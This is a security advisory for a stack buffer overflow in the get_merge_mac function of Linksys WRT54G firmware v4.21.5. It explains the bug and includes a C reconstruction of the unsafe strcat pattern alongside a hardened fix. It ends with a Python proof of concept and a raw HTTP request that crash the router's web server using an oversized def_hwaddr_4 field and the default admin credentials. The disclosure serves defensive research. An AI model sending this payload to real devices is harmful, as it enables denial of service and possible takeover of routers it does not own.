Linksys_WRT54G_get_merge_mac.md

File metadata and controls

59 lines (51 loc) · 3.76 KB

Overview

Product overview https://store.linksys.com/support-product?sku=WRT54G

Affected version

Linksys WRT54G Firmware v4.21.5

Vulnerability details

Linksys WRT54G firmware v4.21.5 has a stack-based buffer overflow in the get_merge_mac function. The function reads the def_hwaddr_%d parameters (def_hwaddr_0 through def_hwaddr_5, the six octets of the cloned WAN MAC address submitted from WanMAC.asp) from the POST request and, at line 17 of the decompiled function, appends each value to its a2 argument with strcat. In the calling function a2 is a stack-allocated buffer of only 24 bytes, and no length check is applied to the parameter values before they are concatenated, so a value longer than the remaining space overruns a2 and corrupts the caller's stack frame. Depending on the payload this crashes the web server (denial of service) or can be turned into remote code execution. apply.cgi requires HTTP Basic authentication, so the bug is post-authentication; the PoC below sends the default credentials (OmFkbWlu is the base64 of ":admin", an empty username with password admin).

[Screenshots of the decompiled get_merge_mac function and of its caller were attached to the original advisory here as image.png]
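To make the bug concrete, the following is an added example (not code from the advisory and not the firmware's own code) in C that reconstructs the pattern described above beside a hardened replacement. The form-body parser, the function names and their bodies are assumptions; the only facts taken from the advisory are the def_hwaddr_N parameter names, the 24-byte size of a2 and the unchecked concatenation into it. Both request bodies are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAC_FIELDS 6
#define MAC_BUF_LEN 24   /* size of the caller's stack buffer a2, per the advisory */

/* Locate the value of def_hwaddr_<i> in an x-www-form-urlencoded body.
 * Returns a pointer into body and stores the value length in *len, or NULL
 * if the key is absent. No percent-decoding: the PoC fields are plain hex. */
static const char *find_hwaddr_field(const char *body, int i, size_t *len)
{
    char key[32];
    snprintf(key, sizeof key, "def_hwaddr_%d=", i);
    size_t klen = strlen(key);
    const char *p = body;
    while ((p = strstr(p, key)) != NULL) {
        if (p == body || p[-1] == '&') {      /* key must start a field */
            p += klen;
            const char *end = strchr(p, '&');
            *len = end ? (size_t)(end - p) : strlen(p);
            return p;
        }
        p += klen;
    }
    return NULL;
}

/* Hypothetical reconstruction of the vulnerable pattern: each field is
 * concatenated into the caller's 24-byte a2 with no check against its size
 * (strncat bounds the source, not the destination, exactly like the strcat
 * in the firmware). Only called with well-formed input here; feeding it the
 * PoC body would overrun a2 and corrupt the caller's stack frame. */
static void get_merge_mac_unsafe(char *a2, const char *body)
{
    a2[0] = '\0';
    for (int i = 0; i < MAC_FIELDS; i++) {
        size_t len;
        const char *v = find_hwaddr_field(body, i, &len);
        if (v != NULL)
            strncat(a2, v, len);
        if (i < MAC_FIELDS - 1)
            strcat(a2, ":");
    }
}

/* Hardened form: every field must be exactly two hex digits, and the output
 * is written with snprintf against the real buffer size. Returns 0 and fills
 * a2 with "XX:XX:XX:XX:XX:XX" on success, -1 (a2 emptied) on any violation. */
static int get_merge_mac_safe(char *a2, size_t a2_len, const char *body)
{
    size_t pos = 0;
    if (a2_len < 3 * MAC_FIELDS)            /* 17 characters plus the NUL */
        return -1;
    a2[0] = '\0';
    for (int i = 0; i < MAC_FIELDS; i++) {
        size_t len;
        const char *v = find_hwaddr_field(body, i, &len);
        if (v == NULL || len != 2 ||
            !isxdigit((unsigned char)v[0]) || !isxdigit((unsigned char)v[1])) {
            a2[0] = '\0';
            return -1;
        }
        int n = snprintf(a2 + pos, a2_len - pos, "%.2s%s", v,
                         i < MAC_FIELDS - 1 ? ":" : "");
        if (n < 0 || (size_t)n >= a2_len - pos) {
            a2[0] = '\0';
            return -1;
        }
        pos += (size_t)n;
    }
    return 0;
}

/* Constructed request bodies (not captured from a device). The second one
 * carries a 64-character def_hwaddr_4, the same shape as the PoC. */
static const char BENIGN_BODY[] =
    "submit_button=WanMAC&action=Apply&mac_clone_enable=1&def_hwaddr=6"
    "&def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A"
    "&def_hwaddr_4=11&def_hwaddr_5=E3";
#define ONES16 "1111111111111111"
static const char OVERSIZED_BODY[] =
    "submit_button=WanMAC&action=Apply&mac_clone_enable=1&def_hwaddr=6"
    "&def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A"
    "&def_hwaddr_4=" ONES16 ONES16 ONES16 ONES16 "&def_hwaddr_5=E3";

int main(void)
{
    char a2[MAC_BUF_LEN];
    get_merge_mac_unsafe(a2, BENIGN_BODY);
    printf("unsafe merge, benign body:  %s\n", a2);
    printf("safe merge, benign body:    rc=%d mac=%s\n",
           get_merge_mac_safe(a2, sizeof a2, BENIGN_BODY), a2);
    printf("safe merge, oversized body: rc=%d (rejected before touching a2)\n",
           get_merge_mac_safe(a2, sizeof a2, OVERSIZED_BODY));
    return 0;
}
```

The hardened version rejects the request as soon as one octet is not exactly two hex digits, so the oversized def_hwaddr_4 never reaches the buffer; even if the check were bypassed, snprintf with the real buffer size makes the worst outcome a truncated string rather than a smashed stack.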

POC

```python
import requests

# Target: the WRT54G web interface. apply.cgi handles the WanMAC.asp form.
url = 'http://192.168.1.1/apply.cgi'
headers = {
    'Host': '192.168.1.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://192.168.1.1',
    # HTTP Basic credentials: 'OmFkbWlu' is base64 for ':admin' (empty username, default password).
    'Authorization': 'Basic OmFkbWlu',
    'Connection': 'close',
    'Referer': 'http://192.168.1.1/WanMAC.asp',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=1',
}

# def_hwaddr_0..5 are the six octets of the cloned WAN MAC. def_hwaddr_4 is
# replaced by a value far longer than the 24-byte stack buffer that
# get_merge_mac concatenates it into.
payload = ('submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&'
           'def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&'
           'def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&'
           'def_hwaddr_5=E3')

# A crashed httpd usually shows up as a reset connection or a timeout rather
# than an HTTP response, so do not wait forever.
try:
    response = requests.post(url, headers=headers, data=payload, timeout=10)
    print('Status:', response.status_code)
    print('Response:', response.text)
except requests.RequestException as exc:
    print('No HTTP response from the device (likely crashed):', exc)
```
The same request as captured on the wire. Note that the Content-Length shown does not match the body below; a client that computes it itself (as requests does) sends the correct value, and a hand-built request must do the same or the server will read a truncated body.

```http
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Origin: http://192.168.1.1
Authorization: Basic OmFkbWlu
Connection: close
Referer: http://192.168.1.1/WanMAC.asp
Upgrade-Insecure-Requests: 1
Priority: u=1

submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&def_hwaddr_5=E3
```